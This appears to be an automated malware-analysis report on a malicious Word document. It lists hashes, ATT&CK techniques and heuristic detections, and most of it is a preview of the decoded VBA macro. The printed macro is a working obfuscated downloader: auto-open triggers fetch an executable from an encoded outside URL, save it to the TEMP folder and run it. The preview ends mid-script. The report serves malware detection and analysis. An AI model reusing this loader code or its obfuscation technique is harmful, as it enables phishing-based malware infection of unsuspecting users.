Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4ec1076a9359aa25…

MALICIOUS

Office (OLE)

57.0 KB Created: 2014-10-21 17:27:00 Authoring application: Microsoft Office Word First seen: 2014-11-01
MD5: 1a9859af7fd60f43a3c3f0a466d0a131 SHA-1: cd905b18da998b1bb480121a25310a03e6f1eef7 SHA-256: 4ec1076a9359aa2506b44b08e84af59b71481b6170cc2084503c2210f31eefa3
332 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains heavily obfuscated VBA macros with multiple auto-execution triggers (Auto_Open, AutoOpen). These macros utilize CreateObject and Shell calls, indicating an attempt to download and execute a secondary payload. The presence of the email address 'facepa1m@live.ru' within the document's metadata suggests a potential phishing lure.

Heuristics 11

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        OJFXJUFZDBX StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6578652E312F736567616D692F6F722E646172612D6473702F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22028 bytes
SHA-256: f0f7e02ac879d1c16548421e122bb9093fe21c24f0f5e83be7a406ce788d6150
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
GoTo imiddacdxatchdzgqjqqaxyritnzbukridfmlyhvcaktwvln
Dim yvoxouprylrhygxfwnvhugxushrkategfdjjvunvggxzwnwz As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A6267746C6769776F71786A746A776366746F717363787A676D76616579646974776B7A6E76716E657877626C6B637A")) For Binary As #6384
Put #6384, , yvoxouprylrhygxfwnvhugxushrkategfdjjvunvggxzwnwz
Close #6384
imiddacdxatchdzgqjqqaxyritnzbukridfmlyhvcaktwvln:
GoTo qggslqpofqvvndehplkqylvvrykiythtmdrhpxislpvoclse
Dim vlftoqjglmpvviwdyuyvbvgbllpxyfpyswstungsquphstkv As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("71626379736962776671637962616E726C7373666977687A63676C626E6465786E72666375796D6C6E70727A6A686870")) For Binary As #34446
Put #34446, , vlftoqjglmpvviwdyuyvbvgbllpxyfpyswstungsquphstkv
Close #34446
qggslqpofqvvndehplkqylvvrykiythtmdrhpxislpvoclse:
GoTo smaqnukkwflpzqdmkfvxpgcpotikrvyxlrefygrmjrtgskrj
Dim jogoibwlonsgshjpgdgpljsjkahungpirxtrrtadodepqcax As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6B6C6169707A7668656E6B7A7479696F6D6A767A68636D65666F77746A686265646D726F6E656E766970646676766373")) For Binary As #36904
Put #36904, , jogoibwlonsgshjpgdgpljsjkahungpirxtrrtadodepqcax
Close #36904
smaqnukkwflpzqdmkfvxpgcpotikrvyxlrefygrmjrtgskrj:
TFCVDJEJBJJ
End Sub
Sub AutoOpen()
GoTo fniniamuscycybzhxruhunxfqkfqjsxxblkyqgqcgslloxyr
Dim crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("66657561766C6C6E6176707776767566727561676376747A66627972726267707864646B7A6662716A6F7570616D6773")) For Binary As #43632
Put #43632, , crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi
Close #43632
fniniamuscycybzhxruhunxfqkfqjsxxblkyqgqcgslloxyr:
GoTo vefvyqnfcqibfmwaxdsjxypuvclynhzbrnxqtpvdpyuytozx
Dim qwfodqdisgobrcwsgqlslpnjuutgjohjzgbnyladauoqxual As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("636C7873776E7179776D6663616E616D797A7773786679786679767275716677726464666F64666B6D77797562637967")) For Binary As #13653
Put #13653, , qwfodqdisgobrcwsgqlslpnjuutgjohjzgbnyladauoqxual
Close #13653
vefvyqnfcqibfmwaxdsjxypuvclynhzbrnxqtpvdpyuytozx:
GoTo tiumrisjxruxvqojyqptnxvflqjzweldmjtvuxglrztyaply
Dim eglkuhfwmanicqeuiswbgngqxtyqpkcxcmgsulfgqcytosue As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E6A6C6871746477686C68796566726A7967686B686A776A6B6777686D6E6276657476787178616D67696C6F6177616B")) For Binary As #41695
Put #41695, , eglkuhfwmanicqeuiswbgngqxtyqpkcxcmgsulfgqcytosue
Close #41695
tiumrisjxruxvqojyqptnxvflqjzweldmjtvuxglrztyaply:
    Auto_Open
End Sub
Sub Workbook_Open()
GoTo ztgglbvveqggfokcqcvgapzhrjxebygiqengiqrdigugfuxq
Dim dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E7266636D737576777A776675616D6A6B757969637A7363737A796A6E6D726A61626E6A7571686C7071747669786469")) For Binary As #49957
Put #49957, , dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw
Close #49957
ztgglbvveqggfokcqcvgapzhrjxebygiqengiqrdigugfuxq:
GoTo hmjettrrimxuijtgzokspdldwnqpxqtnmszpzbfdasbgvrhm
Dim kghscnksqdzjytrdntkyawiorzenatquvillguddackkltug As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("69617A61796665776F78646D746C70637A676D736977616562736C786E676D686169686D6D697367686D656765716A78")) For Binary As #14350
Put #14350, , kghscnksqdzjytrdntkyawiorzenatquvillguddackkltug
Close #14350
hmjettrrimxuijtgzokspdldwnqpxqtnmszpzbfdasbgvrhm:
GoTo ssmpcumjbthzapdvtiqfuvqehajscnyfpagarngauwwtyenh
Dim mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("727A6C6B7A697877706D6870686A6761746766666D677A726F6D64616563746B6565747A6C7876656C796D6E686C7867")) For Binary As #34623
Put #34623, , mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm
Close #34623
ssmpcumjbthzapdvtiqfuvqehajscnyfpagarngauwwtyenh:
    Auto_Open
End Sub
Function OJFXJUFZDBX(ByVal XDQPBMZWZVE As String, ByVal EBDHKIKBOCB As String) As Boolean
     Dim WQTQGAKEBGH As Object, ZIOOUFBOHTB As Long, JFDTBJWPCNU As Long, WGZWKGZMUTY() As Byte

GoTo etdmtxhjlvptfzqdfochzlzffbmifxstjgxoskksowffztny
Dim kwlbreyoqotabzuvsjrefvqnjxvxdupznanxvjlowqmdhmjd As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("79796774646A676D6D6A6166766E7666646A6C6277727A65766D616B6D74736B6B6B6174786269796D76696D66617564")) For Binary As #46512
Put #46512, , kwlbreyoqotabzuvsjrefvqnjxvxdupznanxvjlowqmdhmjd
Close #46512
etdmtxhjlvptfzqdfochzlzffbmifxstjgxoskksowffztny:
GoTo jlvkgvudfgwiofmsjdqjaagqleaofddoxtsqaajnhnmwadjb
Dim zugrhbycnzdgwskzylwtbwkbazwhjihmzmoatfgdmdrtizkl As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("636E736671657761666C6172776974687A74746373646965636B766E7562686375717977626E786E7573736B686A7275")) For Binary As #17297
Put #17297, , zugrhbycnzdgwskzylwtbwkbazwhjihmzmoatfgdmdrtizkl
Close #17297
jlvkgvudfgwiofmsjdqjaagqleaofddoxtsqaajnhnmwadjb:
    Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")
GoTo pzrjnbmdtzvojwutskgkrjdqvkquqtxjogpqhdthzqgdahdk
Dim gwscenzdbdfxqegcltaaovdxtgmsldyylbxdhphynogrnunu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6472767373796467716976697778686172696B69636B7A68716B796468707075677879797474646B7363786F716F7771")) For Binary As #67645
Put #67645, , gwscenzdbdfxqegcltaaovdxtgmsldyylbxdhphynogrnunu
Close #67645
pzrjnbmdtzvojwutskgkrjdqvkquqtxjogpqhdthzqgdahdk:
GoTo iqyandzugojtkmciyuvvnjzfinylpmcokibqiugkcjzjerkd
Dim jndjumicuhccvzqhfngvqaphzbgwwrhrzzumbxktlwasbltm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("72677577626E6F7175726F6371796B676A79716D6A627867666F7277626F787173656A63796F68757564666F6D676364")) For Binary As #23692
Put #23692, , jndjumicuhccvzqhfngvqaphzbgwwrhrzzumbxktlwasbltm
Close #23692
iqyandzugojtkmciyuvvnjzfinylpmcokibqiugkcjzjerkd:
GoTo crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi
Dim hgzxcniccpejjpvdispbjlzudfqbvdnbshabimfwvruydaio As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("666E687179626A7770647A626D73736A6A72636F746D646B727172776578637674796D6261766F61676E66716D657161")) For Binary As #69554
Put #69554, , hgzxcniccpejjpvdispbjlzudfqbvdnbshabimfwvruydaio
Close #69554
crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi:
    WQTQGAKEBGH.Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("544547")), XDQPBMZWZVE, False
GoTo yfmvkuczipgzibdcfwflspfxrkserrscwcaeelaakqqoktpo
Dim ayucaihzajixhhpknunqtndxsfwqzbxwkeoeiwllxxyqkius As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("75686E786874646371726B7563696D706766636C6866617270737779777272686678706774726B73796F7864746F6576")) For Binary As #16460
Put #16460, , ayucaihzajixhhpknunqtndxsfwqzbxwkeoeiwllxxyqkius
Close #16460
yfmvkuczipgzibdcfwflspfxrkserrscwcaeelaakqqoktpo:
GoTo nojozkuqujtkcxtbiohnenosioudykvauctpxyoiwmvznbcm
Dim cpufsvbsntkgmjvofkrtygponbdazfiammolmyxxtwdulwzz As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A6A6F656772767075687071756F6B6F6D706B64786572696A62766D7A67727161726C686E6F74716D61706B6F687061")) For Binary As #64341
Put #64341, , cpufsvbsntkgmjvofkrtygponbdazfiammolmyxxtwdulwzz
Close #64341
nojozkuqujtkcxtbiohnenosioudykvauctpxyoiwmvznbcm:
GoTo adgbzdcbnkgrxhjcfqtqnnalvawqhvvunllzlaaykslituih
Dim xhypbvakjwufrnojqblobafjzgvopzmsufvrkepxfojaqpfw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("62796E736B646B7471776E66696268746878677A7163656F72746E6F736877756663696276727773657A716A73706B6B")) For Binary As #97034
Put #97034, , xhypbvakjwufrnojqblobafjzgvopzmsufvrkepxfojaqpfw
Close #97034
adgbzdcbnkgrxhjcfqtqnnalvawqhvvunllzlaaykslituih:
    WQTQGAKEBGH.Send "send request"

GoTo dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw
Dim jtafvwvpfxgwaqfclvtgfrvodrethgwccbivporturohntvc As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6C74636564757A697569746F6A69656A757064787166717475766E6668617A796F67766D66617866726C746263647764")) For Binary As #97193
Put #97193, , jtafvwvpfxgwaqfclvtgfrvodrethgwccbivporturohntvc
Close #97193
dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw:
GoTo hgwkhazdouyqmroncwencysqfmxyvecfarlgrtqowuumzbcb
Dim uvgfffndleiyreeamyesclerespiibsnvswxxsluaibdgobn As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6568766564676575626A6373766562736A7569656A6C61697173726D75747168656670646C737774776B6C696C767377")) For Binary As #46676
Put #46676, , uvgfffndleiyreeamyesclerespiibsnvswxxsluaibdgobn
Close #46676
hgwkhazdouyqmroncwencysqfmxyvecfarlgrtqowuumzbcb:
GoTo mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm
Dim arurfitxyvpxncpqpdeaijysrixuwcxsbbnypiikevoaxrdf As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6F6D766665707867636B627867766278656968727568646570666A6270756C6D677068727274627A687A656E79756668")) For Binary As #90494
Put #90494, , arurfitxyvpxncpqpdeaijysrixuwcxsbbnypiikevoaxrdf
Close #90494
mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm:
    Do While WQTQGAKEBGH.readyState <> 4
GoTo phznknrlybwjbvvshcrdogtnwqhkyieuzmbluqmwteypcsqf
Dim ahfhidtvepdrsujzqbapciyaeysfynvnqbaijxpuiahmmzdg As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("69776E6A6D746368626975746F737A796B77696C7A6F74756267786D6A646F75666E76706A726F6968766B6665637163")) For Binary As #96367
Put #96367, , ahfhidtvepdrsujzqbapciyaeysfynvnqbaijxpuiahmmzdg
Close #96367
phznknrlybwjbvvshcrdogtnwqhkyieuzmbluqmwteypcsqf:
GoTo ncwhyxfafewsviozrbvripvochwgkkgcjowluwhheyojqhmm
Dim wjmgkctatmcfenjhkdotdnxowszdtpbeflslxrrtmmvbqkvq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6373726869696E6F756F79726B646E756E686F73696D706368756C69686268796672786B62786E667472706E676A7974")) For Binary As #5726
Put #5726, , wjmgkctatmcfenjhkdotdnxowszdtpbeflslxrrtmmvbqkvq
Close #5726
ncwhyxfafewsviozrbvripvochwgkkgcjowluwhheyojqhmm:
GoTo ndgnhoekgasvwokpqytywaxfvjuoovaovvgvxveumgpjmchn
Dim bmhicjlonlahzzlowjawmwajlbfhxzhqwvkfkbhilqjrabkp As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A786664736963796569646F776B67736C6A6E646D65726163686477757A7769616E766D6D716C716977646167636E73")) For Binary As #14676
Put #14676, , bmhicjlonlahzzlowjawmwajlbfhxzhqwvkfkbhilqjrabkp
Close #14676
ndgnhoekgasvwokpqytywaxfvjuoovaovvgvxveumgpjmchn:
    DoEvents
GoTo hbepjbtuzlzpgmywbuecxxwepsxzwflkzrkosjsjzkaihwlz
Dim nlrmcpytjwzwtwuwdacivyfkkkgcfcikgubdqutzdqkgvwtb As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("71626979656661726C6873676A6E6F6465656B677466796879747269617074716B7A646E666971736F6A686771697765")) For Binary As #23763
Put #23763, , nlrmcpytjwzwtwuwdacivyfkkkgcfcikgubdqutzdqkgvwtb
Close #23763
hbepjbtuzlzpgmywbuecxxwepsxzwflkzrkosjsjzkaihwlz:
GoTo qwkbavnkfniijlymxsejoxufjupriutparsoeevipjyrzzoq
Dim eekbykqbbjzjivyfyvwshpcljwtgguqidnhymueuaffbjyfu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6669786C7274756A7776787163686A78757778726E766D6E626177696B66736372676D6361646A6B7665667A65627775")) For Binary As #56197
Put #56197, , eekbykqbbjzjivyfyvwshpcljwtgguqidnhymueuaffbjyfu
Close #56197
qwkbavnkfniijlymxsejoxufjupriutparsoeevipjyrzzoq:
GoTo bpnyhjhwvnkooaanozzktvosbvtslxuzdgtbpgfrjgoyfkmx
Dim vdqgixvkrtvmcirtjronhggctebktztgapgzdzzhwnanegep As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6873726E786D6A656A62696164666A656E636F6466696C6D7867696A6D686C7471796678707074727371626F76656D70")) For Binary As #43904
Put #43904, , vdqgixvkrtvmcirtjronhggctebktztgapgzdzzhwnanegep
Close #43904
bpnyhjhwvnkooaanozzktvosbvtslxuzdgtbpgfrjgoyfkmx:
    Loop

GoTo eahxxouxecdvxrkzxxxqmgaxumzkmltmgdkecruulhxsjzer
Dim vhqrtzykmbxmdmrermhkdvpysnysvctyekvuaywhzbnkblbi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("666C79757578746678646163786271716F6C6B627A746861786678766F6472706C696F747A6F627A776B6B7663746B71")) For Binary As #95145
Put #95145, , vhqrtzykmbxmdmrermhkdvpysnysvctyekvuaywhzbnkblbi
Close #95145
eahxxouxecdvxrkzxxxqmgaxumzkmltmgdkecruulhxsjzer:
GoTo aysfrheqcqxgfrlgtjygzdzoenipqlwfswxmyvoaojopaqdk
Dim hwtfbtmpoglfkpxpbguvnazobagwntgkdvnoggujcfkcolrc As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6C78746E63796E7175746E657A6E706B7570687A61786D6479716764776F6E6764726D62627A6676616C707771687561")) For Binary As #37532
Put #37532, , hwtfbtmpoglfkpxpbguvnazobagwntgkdvnoggujcfkcolrc
Close #37532
aysfrheqcqxgfrlgtjygzdzoenipqlwfswxmyvoaojopaqdk:
GoTo cpfxuloegefcsmhxyobolasxysvogpsjjatxadwsinmkuohy
Dim zjvfpvzuqmeisnmdiludygwashhkeyymszhnsiwnymajkare As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E666B78646E6B756D75746D6C676B747A627261666264726E776975666668766E737261716B6177716A6178636E6669")) For Binary As #93158
Put #93158, , zjvfpvzuqmeisnmdiludygwashhkeyymszhnsiwnymajkare
Close #93158
cpfxuloegefcsmhxyobolasxysvogpsjjatxadwsinmkuohy:
    WGZWKGZMUTY = WQTQGAKEBGH.responseBody

GoTo ofncleimfkwmwaasiadnfyifrvzcyrzpuplhyofnbgyrkdyh
Dim dewkzyszjqbiybtyvgkucdfqcwemybltzsnpwplpsdqllfvq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766B7161756870656B616768766E666F6F6671756F656F78757961756D676964656F796E77787173627A736469797479")) For Binary As #28613
Put #28613, , dewkzyszjqbiybtyvgkucdfqcwemybltzsnpwplpsdqllfvq
Close #28613
ofncleimfkwmwaasiadnfyifrvzcyrzpuplhyofnbgyrkdyh:
GoTo cvzivwrorpfnsdatmyfdxnbjfevdrdncicynzwlqymvszpbp
Dim sclguimjiailizuaatcdzylaccsyqkvpwupdpzlfsqcaqzvr As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("617161727568786B6E7A6E64717062646F62726F6C77777475746A666B74706A71687663736D617368737263706E636A")) For Binary As #44114
Put #44114, , sclguimjiailizuaatcdzylaccsyqkvpwupdpzlfsqcaqzvr
Close #44114
cvzivwrorpfnsdatmyfdxnbjfevdrdncicynzwlqymvszpbp:
GoTo zzlaawdrrnnnrbwueusdfgerhkhkmutxwvyilaooapkmssek
Dim wahxjjggotmhwnliamxywjxuugnuekpsdifyjksialhozmah As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("706F6A6A746675736F6867686E666774636168616569737374787065756C766A727765716E63796F6E69776C726B626A")) For Binary As #63553
Put #63553, , wahxjjggotmhwnliamxywjxuugnuekpsdifyjksialhozmah
Close #63553
zzlaawdrrnnnrbwueusdfgerhkhkmutxwvyilaooapkmssek:
    JFDTBJWPCNU = FreeFile
GoTo qgttmkuektzzjkiwtnylmdusepbmyhklmcgbbjexxuvjfwcg
Dim lbjrvcsyecnuzaquaokwmiapsvrfyhvzuikcxlxiqtpbzsdm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("72696B7672646E7972687467646A6E6B706E77766263657A6B686C776961636B6E6D666E6C6B637674676F7361767672")) For Binary As #56956
Put #56956, , lbjrvcsyecnuzaquaokwmiapsvrfyhvzuikcxlxiqtpbzsdm
Close #56956
qgttmkuektzzjkiwtnylmdusepbmyhklmcgbbjexxuvjfwcg:
GoTo wxyjalgfeaqcamcztvhtynphhmzdmomixhpirdhxrjugukbt
Dim ekfqzxxkqsbruawjpixtmnozsvzdeiscedqnhzbamyqecjmi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("676375666371726F7975616B746B73716862617464677161716A6E6A686E626D73777166686F66797073797477646D6F")) For Binary As #60915
Put #60915, , ekfqzxxkqsbruawjpixtmnozsvzdeiscedqnhzbamyqecjmi
Close #60915
wxyjalgfeaqcamcztvhtynphhmzdmomixhpirdhxrjugukbt:
GoTo aizwoivbncoervbqejqhamzyvjapmrtvxygiylbyoeldnqzi
Dim tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6F7A696661767576636D74666F6A746A7A7575676A6A6778747A716A6E6D73737065757567736F786D626467646B7173")) For Binary As #34306
Put #34306, , tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf
Close #34306
aizwoivbncoervbqejqhamzyvjapmrtvxygiylbyoeldnqzi:
    If Dir(EBDHKIKBOCB) <> StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("")) Then Kill EBDHKIKBOCB
    Open EBDHKIKBOCB For Binary As #JFDTBJWPCNU
    Put #JFDTBJWPCNU, , WGZWKGZMUTY
    Close #JFDTBJWPCNU
GoTo fdmsdtgqrurjbedffqoilzitqntxjicsskoldnrodkvtxcba
Dim gctxumheqecmagirzgjlyfoekvxlwzbmtjzqofynkewrnsbs As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("74686A6A726F6A636B74626E6578667A6B6565676E7763726C6B6B70766C6E61626C65697A6A7779787467646D68616D")) For Binary As #99823
Put #99823, , gctxumheqecmagirzgjlyfoekvxlwzbmtjzqofynkewrnsbs
Close #99823
fdmsdtgqrurjbedffqoilzitqntxjicsskoldnrodkvtxcba:
GoTo qkgqhqwouxxvhewfncxpeawyssbwbuhbqihsiylsoizaketq
Dim irptpukhpvdklcmrwvtwganpcrlwenfrnrxmerpvbvtpvxes As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("797661796D71726A65776E6A66787976696E7774646C7A786E6C6E6E78776C697166747A616D76746C6D666462767964")) For Binary As #66032
Put #66032, , irptpukhpvdklcmrwvtwganpcrlwenfrnrxmerpvbvtpvxes
Close #66032
qkgqhqwouxxvhewfncxpeawyssbwbuhbqihsiylsoizaketq:
GoTo dvvhbutfppycgimjkxtnoqpsudjjiyonnwbmcfodqvukqucc
Dim mbhohgcxsalpqdqmxextcuziblzgcqenlydyafcjrlxfzdpu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("646A71767067786F736A6C7763737661627279676E646275686E6B6A7A727573716D6879727061727A6E617768636266")) For Binary As #40444
Put #40444, , mbhohgcxsalpqdqmxextcuziblzgcqenlydyafcjrlxfzdpu
Close #40444
dvvhbutfppycgimjkxtnoqpsudjjiyonnwbmcfodqvukqucc:
    
    Dim WBVSWOEAZVI
GoTo dmvtxuhdhfrvramgrlakysjzfubamiollmiczbqfzcriczkx
Dim psxojebcebofvkbqipzsdzreerqxpgcvhoxacoqsayuiuqbx As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6B6F70747A646F62716B6871747A77716565637970656F697A6A6D7A6E646A626F656A7563616E73657A6268796C636A")) For Binary As #66538
Put #66538, , psxojebcebofvkbqipzsdzreerqxpgcvhoxacoqsayuiuqbx
Close #66538
dmvtxuhdhfrvramgrlakysjzfubamiollmiczbqfzcriczkx:
GoTo pxfxkmdqqumxngqlkoblarwfbfzjqvpriemoaiztktgyodly
Dim ajdgchqwqfsflqqwvomfdafyxezwkdqdcxiwxtimirmoynoe As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E6B6A6474627A6F7378777A7A696C6A76706D766A656B6872647266677479646A65626B766267716776716262676676")) For Binary As #34151
Put #34151, , ajdgchqwqfsflqqwvomfdafyxezwkdqdcxiwxtimirmoynoe
Close #34151
pxfxkmdqqumxngqlkoblarwfbfzjqvpriemoaiztktgyodly:
GoTo msqgaowwuggrwmtcioedsqbhfvyjyqzzmengxaqctbuugwvy
Dim nixwghekgyycfkbjoewerstwcegaerobpdazafluqyzoeukq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766363796A66617577786C7761617777767A6F78787461746D707A62696475627574776C796E7975687973716E777566")) For Binary As #13237
Put #13237, , nixwghekgyycfkbjoewerstwcegaerobpdazafluqyzoeukq
Close #13237
msqgaowwuggrwmtcioedsqbhfvyjyqzzmengxaqctbuugwvy:
    WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)

GoTo bkrifxodzexmtcpgqlkzhjgfdijktbfdjnxmmtzfpbgrmryh
Dim iyggmykzitafabewdcvcpgsycloafovczvwsubctkzxejabq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766C6A6E7A69716F6474776568776E706E6966677069757A78726474687A6B6C6B75756562627465626D6471746C6966")) For Binary As #76791
Put #76791, , iyggmykzitafabewdcvcpgsycloafovczvwsubctkzxejabq
Close #76791
bkrifxodzexmtcpgqlkzhjgfdijktbfdjnxmmtzfpbgrmryh:
GoTo uxpctscmbpodxncqaliybekcockyydvcmlbxaomtajzaoqwl
Dim gztepmtrvabnzcoyyipmoefzzqfysobifpsrzqvnntrdrbed As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("756E67756F766D667A6B796678736163796E76716C726E656C6C6673686563786E6B6E6E706B616B6575636261667071")) For Binary As #37069
Put #37069, , gztepmtrvabnzcoyyipmoefzzqfysobifpsrzqvnntrdrbed
Close #37069
uxpctscmbpodxncqaliybekcockyydvcmlbxaomtajzaoqwl:
    Set WQTQGAKEBGH = Nothing
GoTo tozyfipqosiefablsmfwrctnftcdoaattlastpzyqekjoerd
Dim jnesmwlsufvuodutzrzrmzelcgjxkczjakidfdcnnkvhnmck As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("7A6A68697470626C7274796D6B69716D77796B6C7268657879636F7A76696D6D777A7873717A6477686162716569617A")) For Binary As #47174
Put #47174, , jnesmwlsufvuodutzrzrmzelcgjxkczjakidfdcnnkvhnmck
Close #47174
tozyfipqosiefablsmfwrctnftcdoaattlastpzyqekjoerd:
GoTo iprbpupajrxovkzgyxiukavaovuqjuedisewjvhosarairzq
Dim okpbralvtqqvgomzpuetnydrzjbykxnphvrdgdbcrblwwknw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6268727077696F7366767677677470777372746467746862717070647374776D676F6E7869786C706769686D64777272")) For Binary As #21343
